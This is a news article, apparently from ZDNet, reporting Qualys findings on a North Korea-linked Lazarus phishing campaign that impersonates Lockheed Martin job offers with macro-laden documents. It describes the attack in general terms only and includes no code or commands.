Lazarus has been tied to a new campaign attacking hopeful job applicants in the defense industry.
The advanced persistent threat (APT) group has been impersonating Lockheed Martin in the latest operation. The Bethesda, Maryland-based company is involved in aeronautics, military technology, mission systems, and space exploration.
Lockheed Martin generated $65.4 billion in sales in 2020 and has approximately 114,000 employees worldwide.
Lazarus is a state-sponsored hacking group with ties to North Korea. The prolific and sophisticated group is generally financially-motivated and is believed to be responsible for serious attacks in the past beginning with the WannaCry ransomware outbreak, as well as the $80 million heist against Bangladeshi Bank, assaults against freight companies, and South Korean supply chains.
On February 8, Qualys Senior Engineer of Threat Research Akshat Pradhan revealed a new campaign using Lockheed Martin’s name to attack job applicants.
In a similar way to past activities that abused the reputation of Northrop Grumman and BAE Systems, Lazarus is sending targets phishing documents pretending to offer employment opportunities.
The documents, named Lockheed_Martin_JobOpportunities.docx and Salary_Lockheed_Martin_job_opportunities_confidential.doc, contain malicious macros which trigger shellcode to hijack control flow, retrieve decoy documents, and create Scheduled tasks for persistence.
Living Off the Land Binaries (LOLBins) are also abused to further the compromise of the target machine. However, when the malicious scripts attempted to pull in a further payload, an error was returned — and so Qualys can’t be sure what the final malware package was meant to achieve.
“We attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and phishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other vendors,” Pradhan says.
This isn’t the first time Lazarus has exploited job candidates or vacancies. F-Secure has previously found samples of phishing emails, masquerading as job offers, that were sent to a system administrator belonging to a targeted cryptocurrency organization.
In related research, Outpost24’s Blueliv cybersecurity team has named Lazarus, Cobalt, and FIN7 as the most prevalent threat groups targeting the financial industry today.
ZDNet has reached out to Lockheed Martin and we will update when we hear back.
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0